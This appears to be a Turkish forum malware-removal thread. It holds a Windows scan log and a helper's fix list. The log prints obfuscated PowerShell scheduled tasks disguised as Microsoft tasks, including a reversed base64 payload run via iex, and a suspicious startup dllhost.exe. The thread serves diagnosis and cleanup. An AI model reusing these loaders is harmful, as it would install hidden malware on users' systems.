O22 - Task: \Microsoft\Windows\MUI\456603549 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "726005064;$tehiI='MmLeyN)lhmxVh.jmWW(QZTijWiG';$rep_var='+&(_gcsm _A*k-T[y*s).9Naxmee (h''yzusggiln+6g 0_Sayyvstxbewm_-;u_4sci_kng_h +S1qysdyt(ecgm.!!I,Oe_;uh8s6i_-ng!? nS3(ys{wt!e_[m._hR+u__nt_qi)m._e.ecI4n_=te4.r_oo[pS-_efr1xviazc_e/rs;.!u9sqwinu_g/ }(Mif_clr)5osn_osfx0t.-vWiifln35_2.;iipu[,b3lksic_n _c_ala5ss_sp3 c__KeP__yd8o{id-/el4_e_g!satqne_ g,volnijd_s v{tVxx_8Atzs())_2;p]uu[b1_li+!c, i-sty2aztl/ico_ =v_(oimjd= )=WF__t-Wza()7_{0bz,yt_=e2[?6]u_lc_Sz=mQbe=nF/{il_aea.,_Exgqiys7_ts_x(aM__ZdouMqj._hy{.tovzarvcgreMn_Zdb6Mz)n_?F52i,lt/e.)tR!e__add5A/l))lB1nykt_kesnr(+M_]Zd_xMjj_xhylpt_vm_rv__roM_[Zd/hM,)e_:(_wb9y5fte=_[1]zk)R2ye3g/vis_ktpr_fy.?+L,o]lca__l_Mnqac_ihgiecne)f.fOu1pe__n1SafubomK1e8dy(c]@qM_dZd?rMuS3nOFloT}W,_AR{0Ev\dfMi_pc4rutos.to1f_gt\_/C_Tb_F\(/TlI{)PM2rZ?d9_M)vu.]G__et+}V6ax6luj(ed(_jMZj6dlM__jh._yht!kvr/_v_rw.MZr_dnMp7,n01uml/nl)=f;.ih,f(,2u_c6,Smx.Q3==_=nrjusl9jl)9rrie,2tu,5rnn(_;i+dnbtw_ ve_v_zwup=(_u_c5_SmlaQ_.feLe__n+g)_th_8;afy-or+_(_i+6nt/r eS0!WDlgb0=a_0;)_S5W1hDb,l n!oz=v_vvyz0fp-8_1u;6wSW46D[bum++{0),{iuuc4zS.m0_Q[+bSrW_aDb2s]_^_1=(_fboy!fte8))hMmwZdvnM64z_({_3I5M_zeS__s}I__g?_8Jupmw]O0dNg?a09-k4!vFc_Ta_wi60og/2_n7dSl9Nep_E_xi=YPvcnf8mitS7+ue3u.SY33-)dqc.My9Zcd_3M[9nSxWg-Db/]iyys_Sr__4!6)5];38}_I2lntm_P_t_.r n3Q?M_wEnt[T7=z_(I0hn3t_4Pt)yr4)z_0;a!I]n_}tPz1tyr_p cjsD_Gg_U=5f(7Ix+nt,.P+t1_r)?!v/vr-zp3b;7N+[tAb_l.llpocuna?tp[eV__i{rl_tu=na_lh+Me_cm1o5zryx_(p(u9In4mthP.rtruz)}(_v-13_)[,qjrewhfg ]vQMvoE.n,aT,xp(4Iv4ntr_P_tw/r)nq0z,2_rez9f4 .icDh[G0Uf_,0oax)1?+00c_0_,_r0x(64y0e=);r_Mpa9mrs7!h(a23l.5_Cdogwpyzt(1u[+cS)jm,Q4j,0=u,_Q[fME62naTu!,v(}v_z_np)_w;3(5w(vp=Vcx_3At2})}Mn{are_s_hzzal_c._G!,ettnD_e8_le9_g_ak_tem=F_o0}rFyeu]n_,ct}_i2o[ynP2_o/i-2ntoweers+(Ql_M_E0_nT!c,_tq)ype}etov2f(x-vuV_rxA-?tc)vx))__(y)_i;}5_[_Dbfll_8Iam(4poyzr_tfa(Mf_Z1dcrMnart-dk-ll__M]Zw+dMzs)d]l_pry_irvr0at55ep __stx)a)t0,ice_ oe=)xtvee0r_bn ,7lno__ngma ?N]7tA_flhl]mocc9a_tveeV_di)rd9tut_a5l1_Meuim_o-qry]i({I_wnty_P0t{2r p7a(A10Jt+6,crr6efz_ =Ib_nti}P[t_jr _kkhXubrB]_ja,mhInh)t4Pm?trwm 2ys3mQ2}Y2ga8,rtgekft_ I[qndt,yPtr4r= !ntn_aL_gg_,U_8I.n__t3b72_ v6FIjbMdx__p,kdUlIfrntma3621- AigWmQtci)_d;x}'']-r.epqla{ce9''.+(._.)/'',6''$(1''y -jrempltac7e''_MZndM9'',p[c_ha)r]8(3f4)r -9relpl}acze''xiy}Sr+'',l[caha,r],(3f7)l);6(l6s ,$einv5:txemup s-D)i|jwh_er[e{_($l_.2Na_me_.L_en_gt6h z-edq _8)e-a_nd_((_Ge_t-eAc_l 2$_c.Fxul1lNsamue)q.A]cches_s.eFi}lenSyyst]emkRi)gh_ts_ -neq5 ''_De/le+teo'')p})r|d]el5;[_En1vi_ro2nm)enht]a::iCu_rr8en)tD+ir_ecitojry2=p!wd-;[fcKvPy_d]0::}WF3tW-()(; ';'$rep_var -rep'+''+'lace($tehiI[13]+$tehiI[18]+$tehiI[13]+$tehiI[13]+$tehiI[6]),(''$''+176/176)'|&($tehiI[22]+$tehiI[3]+$tehiI[10])|&($tehiI[22]+$tehiI[3]+$tehiI[10]);3927229867"
O22 - Task: \Microsoft\Windows\MUI\736457749 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "7659087377;$WZlfr='TeFaE)SQdlxvP.Mfp(his';$rep_var='_&(cgcwm 6A*_-Tny*v).5Na1me. (z''_2usp4i{n_/g _0Sxysqst1eeqm7a;uo!s)i.-ng+_ tS?_ys(ut_e!dm.?gIjO4};u6_s8i_vnga+ uS?)ys_/tye)pm./zRbu}nnttii{mc_e.c/Iins_te?drmon4pS_se.r/9vi=wcgeq{s;jzu_sbiintegb 4eMi4{c6r4dosj=ohf__t._6Wqi59n3k_2r;_-pur_b_lssic__ xc[_las2stsgx w7mB6k-hm{._d!e0ple{fg_a+ate_7 _vk-oi__dp eblY__Vnv4ye(w/)s;1wpu_wbel_-ic-_ hsuttaf(t_i_oc 8xv0o=_id-2 lZ_sUUu]tzd=7()jn{6b_eyt__e.[t)]S_0cwj{8w=c-F-iy{le2e./E_axi_rs_t_3s((gb8b_.lS[_y_u+4er_phyfh_tw9vt]b}(bly,S])18?Fqii/l_ge.5!Rye_iad__A7lu}lBxpyst__esou()bz_bl3.Sjyfrue5jr/hs-ftl!wyt?0bb_[l0S_o):.7(lb_uyt0_e_[q_])2?Riebjgit6svt[gry(_._L_}oc_5a.l9_Ma+_c+hj_in_!e_.glOpt_ein_6Sus4bmK8/eyci(o@osbb3?l8S//SObfF_T_0WA_gR_E,_\M/gi9cqtrocvsao_hft9a\gCk(TF3.\_TgsIPkabpb,/lSp))g.?eGew6tbVy?al_)u/ejg(be7bbl_mSytpune.[rhy8f1t(_wt.tb_byslS_-,(nf9ulxml.)4_;i9_f_((_Sc)rj1wu_==_tn_u-}ll(q)/r3_et7?uars_n;-wi+n_jt pfi0ip-dAh_v?=,zSc9_j_wzd.Lq-e_nv5gt_=hf;[_fo4jr6(}sin)6t_ }_lq84q_qj_=0ho;sl3_qq?iqz _1!=[wiaij3dAvcv_-__1;_vl4q?7qq0o+8+ew){}aS6cu_jw9s[_l}_qq01q_]jk^=!q(_b}zytnue_)8_bbaql_S.s)32hWijpuys[obgP[bXv__km3w)XS__qh)ryWN-3_}o.7!E_9Kk(_r8-_=.tw_4-x__2_v1[05v+e_m__Mii4=o31-G84w0xCpcT?__0]G}r,2mvk_/o5N{_9Vi(6_JNy_+_j.iY8ct+,5__Cqs[z_s,boZ8_V_b_8jF+r!0_h{WDt=EfA}nck_}AmW9nA!-?D1c7wi0acSig}{sr_2SgEf/ec}absYcfU?iaV_//2ASh.(y9]_je2.P]J_l-Dn_Et79z/7__x8/_wG7s[e+/._)b_tbsl_vS[rgliq18qq1wmhu)dzC_?U21_h25_!]);_(}Ib}n4to3Pts9ro 2cvIe8O_h}p=(_pIbnbjtPa-tzrpt)0p};4I2hnt_hP=t0ar qzT_W_tFu=k=f(liInr/t,P7_tr]l)hi?)id7oA0vo-;N/(tbA9[llz_o_c0mat{ze3V.rir.8truttalk_M=e2_mo_cr)y_b((0kI_n_ytPl.t.rd6)(__-=13/),_5r[ez)f __v0IqnOhf,,t(_wIn]rt!P5ftrb{)!0_t,r_+e_f?_ T7iW{F__u,=p07x06105_090o2,0(6xp4mq0)m_;gMcnar_zsih,3aly2.gCb_op_)yu(8_Scp)j{w__,0_b,0vavIOk_h_,_gii9yduAf_v)__;m(lu(l{_Y5Vjvveo-)_M7_ar,us}h/_al5-.tG_letj.D+eo=leskgdarmte,_FnofirF)[u?n44ctoqi_o=tnP_iori__ntx_eor{_(vv8I_O._h,a_t_yutpe6moxf_a(l?8YfVgvve{_).)gq)(e_)?;__}[/rD_l_-lI+1m_pk_or_}t6(5ebb6cl3S5.nt8wdul1xlbihb.ll)S)_j])p+3ri?2v_a_1te_h zs8=ta_xtri__c ete}xs[te__rtnr1 l_gotnxag n?N_t_xAlw_luo3.cakpt_e_4Vi-hritj_uakwl_Myhem8!o0r=_y(r-I6n_btPhut6r-{ Zz)N[j//IJ}=,0r__ef{_ _I3jnt7aPht2xr r_X?w_8gY=8,7Iepnt0aP7tt_r ?_M8FlmhwaiA!,__rem!fq 4_Inx_t}P9_trew rS_.DG95B5n6!,UaeIsn?ct3[c2_ _wlo_?qkZ(_,Ub1Iunp_t3_b2v g_xEj7ymvcb);.l}w ''7-r]epxlazcew''._(._.)o'',_''$w1''3 -wrevpl1ac}e''_bbdlSc'',_[c_hapr]_(304)m -nreepl[ac0e''/murzCnU''_,[lchpar[](m37m))_;(_lso $senxv:ote.mpt -sDir|wwhefrel{(y$_+.N3amge.pLe7ng}thq -{eqc 8_)-[an_d(5(G-et_-A_cl5 $]_.jFu4ll)Nanmek).2Ac/ce_ss2.Fril3eS4ys_te_mR.ig2htrs u-enq 1''Daelgetye''u)}n)|.derl;_[E5nvsir_on_me,ntd]:_:C/urgre_ntyDi(re_ct_orwy=_pw)d;v[w_Bkhm]!::rZU]Utgd(k);';'$rep_var -rep'+''+'lace($WZlfr[13]+$WZlfr[17]+$WZlfr[13]+$WZlfr[13]+$WZlfr[5]),(''$''+808/808)'|&($WZlfr[19]+$WZlfr[1]+$WZlfr[10])|&($WZlfr[19]+$WZlfr[1]+$WZlfr[10]);8186189367"
O22 - Task: \Microsoft\Windows\Setup\EOSNotify - C:\WINDOWS\system32\EOSNotify.exe (file missing)
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\UpdateAssistant - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:EosWu:{} (file missing)
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:EosWu:{} /CalendarRun (file missing)
O22 - Task: Adobe Uninstaller - C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe --sapCode=PHSP --productVersion=21.0.2 --productPlatform=win64 --appletID=AppsPanel_BL --appletVersion=1.0 --appMode=Uninstall (file missing)
O22 - Task: ASC_PerformanceMonitor - C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe /Task (file missing)
O22 - Task: ASC_SkipUac_PC - C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe /SkipUac (file missing)
O22 - Task: BlueStacksHelper_nxt - C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe -sr
O22 - Task: Driver Booster Scheduler - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\Scheduler.exe /scheduler (file missing)
O22 - Task: Driver Booster SkipUAC (PC) - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\DriverBooster.exe /skipuac (file missing)
O22 - Task: Driver Booster Update - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\AutoUpdate.exe /auto (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: OneDrive Reporting Task-S-1-5-21-2561423588-803624942-3961578858-1001 - C:\Users\PC\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1615884649 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled assistant Autoupdate 1638551822 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1606549127 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1609136372 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1610439318 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1638551806 - C:\Users\PC\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1555434623 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled assistant Autoupdate 1604332151 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1555434621 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1604332142 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O23 - Service R2: AdaptiveSleepService - C:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe
O23 - Service R2: AMD External Events Utility - C:\WINDOWS\system32\atiesrxx.exe
O23 - Service R2: Bonjour Service - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service R2: Canon Inkjet Printer/Scanner/Fax Extended Survey Program - (IJPLMSVC) - C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service R2: EABackgroundService - C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe -start
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: ICEsound Service - (ICEsoundService) - C:\WINDOWS\system32\ICEsoundService64.exe
O23 - Service R2: LMIGuardianSvc - C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
O23 - Service R2: LogMeIn Hamachi Tunneling Engine - (Hamachi2Svc) - C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe -s
O23 - Service R2: MEmuSVC - C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
O23 - Service R2: MonectServerService - D:\Pc remote\PC Remote Receiver\MonectServerService.exe
O23 - Service R2: PnkBstrA - C:\WINDOWS\system32\PnkBstrA.exe (file missing)
O23 - Service R2: Samsung UPD Utility Service - (SamsungUPDUtilSvc) - C:\WINDOWS\SysWOW64\SecUPDUtilSvc.exe
O23 - Service R2: SCP DS3 Service - (Ds3Service) - C:\Users\PC\Desktop\Efe\ps3 controller\ps3 controller\ScpServer\bin\ScpService.exe
O23 - Service R2: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: EQU8_19 - C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe
O23 - Service S3: GalaxyClientService - C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe (file missing)
O23 - Service S3: GalaxyCommunication - C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe (file missing)
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.99\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (file missing)
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe (file missing)
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe
O26 - Tools: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath (default) = C:\Program Files (x86)\IObit\Advanced SystemCare\DiskDefrag.exe (file missing)
--
End of file - Time spent: 82,4 sec. - 67878 bytes, CRC32: FFFFFFFF. Sign: 粀ꁓacv
Megapat
- Katılım
- 31 Temmuz 2015
- Mesajlar
- 7.593
- Makaleler
- 1
- Çözümler
- 74
McAfee ürünlerini kullanmıyorsanız aşağıdaki araçla sistemden kaldırın.
Bunları fixleyin:
McAfee kullanmıyorsanız bunları da fixleyin:
Aşağıdaki aracı indirip güncelledikten sonra sisteme tarama yapın, bulunanları kaldırın.
www.emsisoft.com
Bunları fixleyin:
Kod:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = http://www.joygame.com/games.aspx?g=2001
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyOverride] = *.local
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O1 - Hosts: Reset contents to default
O4 - HKCU\..\StartupApproved\Run: [101XPGameCenterTR] = C:\Program Files (x86)\101XP Game Center TR\launcher101xp.exe (file missing) (2021/11/28)
O4 - HKCU\..\StartupApproved\Run: [GogGalaxy] = C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe /launchViaAutoStart (file missing) (2021/01/03)
O4 - HKCU\..\StartupApproved\Run: [jabber] = C:\Users\PC\AppData\Local\jabber\jabber.exe (file missing) (2020/12/04)
O4 - HKCU\..\StartupApproved\Run: [Opera Browser Assistant] = C:\Users\PC\AppData\Local\Programs\Opera\assistant\browser_assistant.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/10/30)
O4 - HKCU\..\StartupApproved\Run: [Web Companion] = C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (file missing) (2020/12/24)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries\IpLWqIYgTk.url -> file:///C:\ProgramData\PyTPhClTUh\dllhost.exe (2020/11/25)
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2021/02/13)
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup = C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup = %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries
O10 - Unknown file in Winsock LSP: C:\Program Files (x86)\Bonjour\mdnsNSP.dll
O15 - Trusted Zone: *.localhost
O15 - Trusted Zone: http://webcompanion.com
O22 - BITS Job: (download) {9FAF0851-0E14-4AEB-B148-C6D3CC2C1AC4} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/apvauhzytyih5dpik5xo7aixju_154/efniojlnjndmcbiieegkicadnoecjjef_154_all_ad5aj5nvkrg3kfsvqiwhdfj5fvyq.crx3 -> C:\Users\PC\AppData\Local\Temp\chrome_BITS_10708_1349940093\efniojlnjndmcbiieegkicadnoecjjef_154_all_ad5aj5nvkrg3kfsvqiwhdfj5fvyq.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$VCcW='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';$vPxR='KePMxjAJinX';$URJHEF=($vPxR[8]+$vPxR[1]+$vPxR[4]);&$URJHEF(&$URJHEF ('''[TeDdFaxt.EncoDdFading]::UTDdFaF''+2*2*2+''.GeDdFatStDdFaring([ConDdFavert]::Fro''+''mDdFaB''+''ase''+8*8+''StriDdFang(([reDdFagex]:DdFa:MaDdFatchDdFaes(''''pkyS1hUdkgyZuFmRkRUayFmRkREdTRXZhZEZEdkL4YUYGRGRUVlO601ZulWYGRGRk92YhZEZE5WRuQHehZEZEVGVu0WZ0FmRkR0c5FmRkR0UbhCehZEZEVWYGRGRptTKyVmYhZEZE1WduxWYGRGRhlmclNlLmJFbmlHZi9GJrcCInsCblRWYGRGRv1kLmJFbmlHZi9GJoASKpc1YDZFJocmbpJHdhZEZENFNhZEZEZTZzFWYGRGRC12bhZEZEJnR6oTX0JXZ2FmRkRkbvNkLtVGdhZEZENXeTtFKgMWYGRGRlRWPLVHS1RyOyVmYtFmRkRUduxWYpFmRkRkclNFLsVWYGRGRk9WTgQ3YlFmRkREblNHf9dCMFZVSSRETBFmRkR0QJNVWIBFXuwFXnAScl1CIElUZhZEZENWa2VGRu8FJ7BSZyFmRkRUZodHflZXahZEZEJHZrFmRkR0cpR2XyMTYGRGRulWYGRGR3BSatFmRkR0dn1jZSxmZ5RmYvRSf7YXQqtEWYRCIuJXYGRGR1RXZy13KrYmUsZWekRyOrRXTyRFJgI3b4JWLg0lZSxmZ5RGJbJGRhZFJgI3bhZEZEhnYtASXTFkTkNFJbZXQqtEWYRSPdNVQOR2UksldBp2SYhFJ7sGdNJHVkAicvFmRkREei1CIpITNxAicvJWLgsGdNJHVkACZuFmRkRUYi1CIzIDK9sGdNJHVk0HM9YmUsZWekRyepQnb192QuIGRhZFJgU2ZtAiZSxmZ5RGJoYWa7lyKrMVQOR2UksDduV3bD5idBp2SYhFJgQHbtAyUB5EZTRyOw0zUB5EZTRCKy9WYGRGRmtDM9YmUsZWekRyOdBzWiRUYWRSPrRXTyRFJ7kSTtNmTFBFJoMXZhZEZERXeCRXYGRGRldkL4YEVVpjOddmbhZEZElGZvNmbF5CdhZEZEhXZU5SblFmRkREdzl3Ub1jYEFmVksXKN12YOVEUk01ZulmchZEZER3cbxidBp2SYhFJd11WlRXYGRGR5J2WoMWZhZEZERGIu9Wa0NWYGRGRuVnZ'''',''''.'''',''''RiDdFaghDdFatTDdFaoLDdFaeft'''')|FoDdFarEaDdFach {$DdFa_DdFa.valDdFaue}) -jDdFao''+''in ''''''''))-repDdFalace''''DDdFadFa''''|&(''''iDdFaeDdFax'''');''-'+'rep'+'lace''DdFa'''))"
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
